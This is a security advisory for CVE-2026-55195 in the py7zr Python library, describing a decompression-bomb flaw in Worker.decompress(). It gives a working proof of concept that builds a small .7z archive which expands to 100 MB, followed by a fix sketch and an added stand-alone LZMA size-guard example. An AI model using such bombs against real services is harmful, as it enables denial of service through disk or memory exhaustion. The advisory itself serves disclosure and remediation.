PT-2026-51097 · Pypi · Py7Zr

Published 2026-06-19 · Updated 2026-06-19 · CVE-2026-55195

CVSS v4.0: 6.9 (Medium)
Vector: AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
py7zr's Worker.decompress() extracts archive entries without tracking total decompressed size. A crafted .7z file can exhaust disk or memory before the extraction completes.
Measured: 15.6 KB archive → 100 MB output (6,556:1 ratio).
Proof of concept:

```python
import io
import os
import tempfile

import py7zr

# create bomb: compress 100MB of zeros into ~15KB
bomb_path = tempfile.mktemp(suffix='.7z')
with py7zr.SevenZipFile(bomb_path, 'w') as z:
    z.writef(io.BytesIO(b'\x00' * 100 * 1024 * 1024), 'bomb.bin')

print(f'archive size: {os.path.getsize(bomb_path):,} bytes')

# extract — no size check
with py7zr.SevenZipFile(bomb_path, 'r') as z:
    z.extractall(path=tempfile.mkdtemp())

print('extracted 100 MB from ~15 KB archive')
```
Root cause: Worker.decompress() in py7zr/worker.py writes decompressed data directly to disk without a running total or configurable size limit. There is no equivalent of Python's zipfile max size parameter.
Fix: track cumulative decompressed bytes and raise before writing if a limit is exceeded:
```python
MAX_EXTRACT_SIZE = 2 * 1024 ** 3  # 2 GB default, configurable

# Sketch of the guard inside Worker.decompress(): decompressed_chunks is the
# decompressor's output stream and outfile the destination file handle;
# DecompressionBombError is the new exception the fix adds to py7zr.exceptions.
total = 0
for chunk in decompressed_chunks:
    total += len(chunk)
    if total > MAX_EXTRACT_SIZE:
        raise py7zr.exceptions.DecompressionBombError(
            f'Extraction aborted: decompressed size exceeded {MAX_EXTRACT_SIZE} bytes'
        )
    outfile.write(chunk)
```
Tested on py7zr 0.22.0, Python 3.12, Ubuntu 22.04.
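The same cumulative-size guard, as an added stand-alone example that is not from the advisory or from py7zr: it wraps Python's stdlib LZMA decompressor (the codec 7z uses) so it runs without the library, and builds a constructed bomb of compressed zeros the way the PoC does. The names DecompressionBombError, decompress_limited and build_bomb are chosen here; the per-call max_length additionally bounds memory, which the sketch above does not address.

```python
import io
import lzma


class DecompressionBombError(Exception):
    """Raised when cumulative decompressed output would exceed the limit."""


def decompress_limited(compressed: bytes, max_size: int, outfile=None,
                       in_chunk: int = 64 * 1024, out_chunk: int = 1024 * 1024) -> int:
    """Stream-decompress an xz/LZMA payload into outfile, aborting past max_size.

    Two guards: max_length caps how much output a single decompress() call may
    produce (bounded memory even at a 6,000:1 ratio), and the running total
    stops the write before the disk limit is exceeded. Returns bytes written.
    """
    dec = lzma.LZMADecompressor()
    src = io.BytesIO(compressed)
    outfile = io.BytesIO() if outfile is None else outfile
    total = 0
    while not dec.eof:
        if dec.needs_input:
            data = src.read(in_chunk)
            if not data:
                raise lzma.LZMAError("truncated compressed stream")
        else:
            data = b""  # decompressor still holds pending output; drain it first
        chunk = dec.decompress(data, max_length=out_chunk)
        total += len(chunk)
        if total > max_size:
            raise DecompressionBombError(
                f"Extraction aborted: decompressed size exceeded {max_size} bytes")
        outfile.write(chunk)
    return total


def build_bomb(payload_size: int = 8 * 1024 * 1024) -> bytes:
    """Constructed sample input: a run of zeros, the same trick as the PoC archive."""
    return lzma.compress(b"\x00" * payload_size)


if __name__ == "__main__":
    bomb = build_bomb()
    print(f"compressed: {len(bomb):,} bytes, expands to {8 * 1024 * 1024:,}")
    try:
        decompress_limited(bomb, max_size=4 * 1024 * 1024)
    except DecompressionBombError as exc:
        print("blocked:", exc)
```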

Related Identifiers

CVE-2026-55195
GHSA-GJRG-MPP7-G774

Affected Products

Py7Zr